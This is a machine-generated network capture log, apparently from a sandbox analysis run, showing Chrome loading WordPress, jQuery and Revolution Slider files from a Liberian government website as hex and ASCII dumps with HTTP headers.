                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 70 78 3b 7d 0d 0a 0d 0a 72 73 2d 63 6f 6c 75 6d 6e 20 2e 72 73 2d 70 61 72 61 6c 6c 61 78 2d 77 72 61 70 20 72 73 2d 6c 6f 6f 70 2d 77 72 61 70 2c 0d 0a 72 73 2d 63 6f 6c 75 6d 6e 20 2e 72 73 2d 70 61 72 61 6c 6c 61 78 2d 77 72 61 70 20 72 73 2d 6d 61 73 6b 2d 77 72 61 70 2c 0d 0a 72 73 2d 63 6f 6c 75 6d 6e 20 2e 72 73 2d 70 61 72 61 6c 6c 61 78 2d 77 72 61 70 2c 0d 0a 72 73 2d 63 6f 6c 75 6d 6e 20 2e 72 65 76 5f 6c 61 79 65 72 5f 69 6e 5f 63 6f 6c 75 6d 6e 20 7b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 20 7d 0d 0a 0d 0a 2e 72 65 76 5f 62 72 65 61 6b 5f 63 6f 6c 75 6d 6e 73 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 20 7d 0d 0a 2e 72 65 76 5f 62 72 65 61 6b 5f 63 6f 6c 75 6d 6e 73 20 72 73 2d
                                                                                                                        Data Ascii: px;}rs-column .rs-parallax-wrap rs-loop-wrap,rs-column .rs-parallax-wrap rs-mask-wrap,rs-column .rs-parallax-wrap,rs-column .rev_layer_in_column { vertical-align: top; }.rev_break_columns { display: block !important }.rev_break_columns rs-
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 61 64 6f 77 3a 6e 6f 6e 65 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 7d 0d 0a 0d 0a 2e 72 65 76 2d 62 74 6e 2e 72 65 76 2d 75 70 70 65 72 63 61 73 65 2c 0d 0a 2e 72 65 76 2d 62 74 6e 2e 72 65 76 2d 75 70 70 65 72 63 61 73 65 3a 76 69 73 69 74 65 64 09 09 09 7b 20 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 20 20 7d 0d 0a 0d 0a 2e 72 65 76 2d 62 74 6e 20 20 69 09 09 09 09 09 09 09 09 7b 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 70 6f 73 69 74 69 6f
                                                                                                                        Data Ascii: adow:none; text-decoration: none !important; box-sizing:border-box; cursor: pointer;}.rev-btn.rev-uppercase,.rev-btn.rev-uppercase:visited{ text-transform: uppercase; }.rev-btn i{ font-size: inherit; font-weight: normal; positio
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 0d 0a 72 73 2d 6c 6f 61 64 65 72 20 09 7b 0d 0a 09 74 6f 70 3a 35 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 7d 0d 0a 0d 0a 72 73 2d 6c 6f 61 64 65 72 2e 6f 66 66 20 7b 0d 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 72 73 2d 6c 6f 61 64 65 72 2e 73 70 69 6e 6e 65 72 30 20 7b 0d 0a 09 77 69 64 74 68 3a 20 34 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2e 2e 2f 61 73 73 65 74 73 2f 6c 6f 61 64
                                                                                                                        Data Ascii: *******/rs-loader {top:50%; left:50%;z-index:10000;position:absolute;}rs-loader.off {display: none !important;}rs-loader.spinner0 {width: 40px;height: 40px;background-color: #fff;background-image:url(../assets/load
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 2e 68 65 6c 70 67 72 69 64 20 09 09 09 09 09 20 20 20 7b 62 6f 72 64 65 72 3a 32 70 78 20 64 61 73 68 65 64 20 23 63 30 33 39 32 62 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 30 20 7d 0d 0a 23 72 65 76 73 6c 69 64 65 72 6c 6f 67 6c 6f 67 6c 6f 67 09 09 09 09 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 20 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 77 69 64 74 68 3a 32 30 30 70 78 3b 68 65 69 67 68 74 3a 31 35 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 37 29 3b 20 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30
                                                                                                                        Data Ascii: .helpgrid {border:2px dashed #c0392b;position:absolute;top:0px;left:0px;z-index:0 }#revsliderlogloglog{padding:15px;color:#fff;position:fixed; top:0px;left:0px;width:200px;height:150px;background:rgba(0,0,0,0.7); z-index:100000; font-size:10
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 72 6f 74 61 74 65 28 32 31 36 64 65 67 29 3b 6f 70 61 63 69 74 79 3a 2e 36 7d 72 73 2d 6c 6f 61 64 65 72 2e 73 70 69 6e 6e 65 72 36 20 2e 72 73 2d 73 70 69 6e 6e 65 72 2d 69 6e 6e 65 72 20 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 38 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 35 32 64 65 67 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 35 32 64 65 67 29 3b 6f 70 61 63 69 74 79 3a 2e 37 7d 72 73 2d 6c 6f 61 64 65 72 2e 73 70 69 6e 6e 65 72 36 20 2e 72 73 2d 73 70 69 6e 6e 65 72 2d 69 6e 6e 65 72 20 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 39 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 38 38 64 65 67 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28
                                                                                                                        Data Ascii: rotate(216deg);opacity:.6}rs-loader.spinner6 .rs-spinner-inner span:nth-child(8){transform:rotate(252deg);-webkit-transform:rotate(252deg);opacity:.7}rs-loader.spinner6 .rs-spinner-inner span:nth-child(9){transform:rotate(288deg);-webkit-transform:rotate(
                                                                                                                        2025-01-10 13:54:47 UTC3856INData Raw: 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 72 73 2d 72 65 76 65 61 6c 65 72 2d 31 34 2d 32 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 30 2c 30 2c 31 2c 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 32 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 30 2c 30 2c 31 2c 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 38 30 25 2c 2d 38 30 25 2c 30 29 7d 38 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 30 2c 30 2c 31 2c 33 36 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 38 30 25 2c 2d 38 30 25 2c 30 29 7d 31 30
                                                                                                                        Data Ascii: translate3d(0,0,0)}}@-webkit-keyframes rs-revealer-14-2{0%{-webkit-transform:rotate3d(0,0,1,0deg) translate3d(0,0,0)}20%{-webkit-transform:rotate3d(0,0,1,0deg) translate3d(80%,-80%,0)}80%{-webkit-transform:rotate3d(0,0,1,360deg) translate3d(80%,-80%,0)}10


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        22192.168.2.74979469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC570OUTGET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC368INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 13 Nov 2024 23:42:19 GMT
                                                                                                                        ETag: "12a8-626d3e272903a"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 4776
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:47 UTC4776INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53
                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toS


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        23192.168.2.74979669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC391OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Fri, 09 Jun 2023 05:49:24 GMT
                                                                                                                        ETag: "3509-5fdabee5f2100"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 13577
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:47 UTC7823INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                        Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                        2025-01-10 13:54:47 UTC5754INData Raw: 6c 69 63 65 28 31 29 29 7c 7c 41 5b 72 5d 7c 7c 75 28 22 63 73 73 2d 6e 75 6d 62 65 72 22 2c 27 4e 75 6d 62 65 72 2d 74 79 70 65 64 20 76 61 6c 75 65 73 20 61 72 65 20 64 65 70 72 65 63 61 74 65 64 20 66 6f 72 20 6a 51 75 65 72 79 2e 66 6e 2e 63 73 73 28 20 22 27 2b 65 2b 27 22 2c 20 76 61 6c 75 65 20 29 27 29 29 2c 51 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 22 63 73 73 2d 6e 75 6d 62 65 72 22 29 3b 76 61 72 20 53 2c 50 2c 6b 2c 48 2c 45 3d 73 2e 64 61 74 61 3b 69 28 73 2c 22 64 61 74 61 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 2c 6f 2c 61 3b 69 66 28 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 32 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 66 6f 72
                                                                                                                        Data Ascii: lice(1))||A[r]||u("css-number",'Number-typed values are deprecated for jQuery.fn.css( "'+e+'", value )')),Q.apply(this,arguments))},"css-number");var S,P,k,H,E=s.data;i(s,"data",function(e,t,r){var n,o,a;if(t&&"object"==typeof t&&2===arguments.length){for


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        24192.168.2.74979969.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC383OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC370INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 28 Aug 2023 17:14:23 GMT
                                                                                                                        ETag: "15601-603fed35e19c0"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 87553
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:47 UTC7822INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                        Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 66 65 28 65 2c 22 69 6e 70 75 74 22 29 7c 7c 66 65 28 65 2c 22 62 75 74 74 6f 6e 22 29 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63
                                                                                                                        Data Ascii: dset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function B(t){return function(e){return fe(e,"input")&&e.type===t}}function _(t){return function(e){return(fe(e,"input")||fe(e,"button"))&&e.type===t}}func
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 74 69 6f 6e 22 29 26 26 21 21 65 2e 73 65 6c 65 63 74 65 64 7d 2c 73 65 6c 65 63 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 21 30 3d 3d 3d 65 2e 73 65 6c 65 63 74 65 64 7d 2c 65 6d 70 74 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 65 2e 6e 6f 64 65 54 79 70 65 3c 36 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 62 2e 70 73 65 75 64 6f 73 2e 65 6d 70 74 79 28 65 29 7d 2c 68 65 61 64 65 72 3a 66 75 6e 63
                                                                                                                        Data Ascii: tion")&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!b.pseudos.empty(e)},header:func
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 74 68 69 73 2e 67 65 74 28 29 2c 63 65 28 65 2c 74 29 29 29 29 7d 2c 61 64 64 42 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 28 6e 75 6c 6c 3d 3d 65 3f 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 3a 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 2e 66 69 6c 74 65 72 28 65 29 29 7d 7d 29 2c 63 65 2e 65 61 63 68 28 7b 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 74 26 26 31 31 21 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 3f 74 3a 6e 75 6c 6c 7d 2c 70 61 72 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 70 61 72 65 6e 74 4e 6f 64 65 22 29 7d 2c 70 61 72 65 6e 74 73 55 6e 74 69 6c 3a 66 75
                                                                                                                        Data Ascii: this.get(),ce(e,t))))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}}),ce.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return d(e,"parentNode")},parentsUntil:fu
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 20 30 21 3d 3d 28 74 3d 7a 2e 67 65 74 28 6f 2c 6e 29 29 3f 74 3a 76 6f 69 64 20 30 21 3d 3d 28 74 3d 56 28 6f 2c 6e 29 29 3f 74 3a 76 6f 69 64 20 30 3b 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7a 2e 73 65 74 28 74 68 69 73 2c 6e 2c 65 29 7d 29 7d 2c 6e 75 6c 6c 2c 65 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6e 75 6c 6c 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7a 2e 72 65 6d 6f 76 65 28 74 68 69 73 2c 65 29 7d 29 7d 7d 29 2c 63 65 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 3d 28 74
                                                                                                                        Data Ascii: 0!==(t=z.get(o,n))?t:void 0!==(t=V(o,n))?t:void 0;this.each(function(){z.set(this,n,e)})},null,e,1<arguments.length,null,!0)},removeData:function(e){return this.each(function(){z.remove(this,e)})}}),ce.extend({queue:function(e,t,n){var r;if(e)return t=(t
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 29 2c 74 3d 30 3b 77 68 69 6c 65 28 28 69 3d 61 5b 74 2b 2b 5d 29 26 26 21 75 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 29 7b 75 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3d 69 2e 65 6c 65 6d 2c 6e 3d 30 3b 77 68 69 6c 65 28 28 6f 3d 69 2e 68 61 6e 64 6c 65 72 73 5b 6e 2b 2b 5d 29 26 26 21 75 2e 69 73 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 29 75 2e 72 6e 61 6d 65 73 70 61 63 65 26 26 21 31 21 3d 3d 6f 2e 6e 61 6d 65 73 70 61 63 65 26 26 21 75 2e 72 6e 61 6d 65 73 70 61 63 65 2e 74 65 73 74 28 6f 2e 6e 61 6d 65 73 70 61 63 65 29 7c 7c 28 75 2e 68 61 6e 64 6c 65 4f 62 6a 3d 6f 2c 75 2e 64 61 74 61 3d 6f 2e 64 61 74 61 2c 76 6f 69 64 20 30 21 3d 3d 28 72 3d 28 28 63 65 2e 65 76 65 6e
                                                                                                                        Data Ascii: ),t=0;while((i=a[t++])&&!u.isPropagationStopped()){u.currentTarget=i.elem,n=0;while((o=i.handlers[n++])&&!u.isImmediatePropagationStopped())u.rnamespace&&!1!==o.namespace&&!u.rnamespace.test(o.namespace)||(u.handleObj=o,u.data=o.data,void 0!==(r=((ce.even
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 74 3d 52 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 7d 29 7d 2c 62 65 66 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                                        Data Ascii: pendChild(e)})},prepend:function(){return $e(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Re(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return $e(this,arguments,function(e){this.parentNode
